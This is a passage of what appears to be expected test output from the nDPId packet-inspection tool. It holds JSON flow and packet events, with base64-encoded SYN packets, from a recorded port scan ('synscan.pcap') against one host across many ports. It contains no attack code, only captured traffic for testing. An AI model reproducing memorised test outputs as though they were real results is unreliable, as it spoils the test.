+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAs4isAADYGMEesEAAIQA2GNIzTCE7dU4MZAAAAAGACDAAkPgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsa44AADEGq+SsEAAIQA2GNIzTBP3dU4MZAAAAAGACCAArjwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAse3cAADIGmvusEAAIQA2GNIzTF2TdU4MZAAAAAGACDAAVKAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjUAADcGmz2sEAAIQA2GNIzTBCLdU4MZAAAAAGACEAAkagAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsodUAADUGcZ2sEAAIQA2GNIzTBODdU4MZAAAAAGACCAArrAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsNa8AAC4G5MOsEAAIQA2GNIzTIzHdU4MZAAAAAGACDAAJWwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsa+sAACoGsoesEAAIQA2GNIzTBKHdU4MZAAAAAGACDAAn6wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsTKAAADUGxtKsEAAIQA2GNIzT\/mndU4MZAAAAAGACCAAyIgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsqL8AADQGa7OsEAAIQA2GNIzTANTdU4MZAAAAAGACBAAzuAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsh6AAAC8GkdKsEAAIQA2GNIzTBEjdU4MZAAAAAGACEAAkRAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsYFoAACoGvhisEAAIQA2GNIzTHVjdU4MZAAAAAGACDAAPNAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsNFoAACYG7hisEAAIQA2GNIzTFtrdU4MZAAAAAGACDAAVsgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAshW4AADgGiwSsEAAIQA2GNIzTCEndU4MZAAAAAGACBAAsQwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsT2wAACwGzQasEAAIQA2GNIzTCJTdU4MZAAAAAGACBAAr+AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsQX8AAC0G2fOsEAAIQA2GNIzTDSfdU4MZAAAAAGACCAAjZQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsGTIAADgG90CsEAAIQA2GNIzTIyvdU4MZAAAAAGACBAARYQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsw2sAADAGVQesEAAIQA2GNIzTBLHdU4MZAAAAAGACBAAv2wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsKsAAAC0G8LKsEAAIQA2GNIzThwzdU4MZAAAAAGACCACpfwAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAstssAADcGWqesEAAIQA2GNIzTA3jdU4MZAAAAAGACEAAlFAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZkAACgGstmsEAAIQA2GNIzTIAjdU4MZAAAAAGACBAAUhAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs9XgAADsGF\/qsEAAIQA2GNIzTB\/\/dU4MZAAAAAGACEAAgjQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsbSgAADkGokqsEAAIQA2GNIzTC7bdU4MZAAAAAGACCAAk1gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsGhwAADYG+FasEAAIQA2GNIzTgAbdU4MZAAAAAGACDACshQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs9osAADAGIeesEAAIQA2GNIzTBB3dU4MZAAAAAGACBAAwbwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 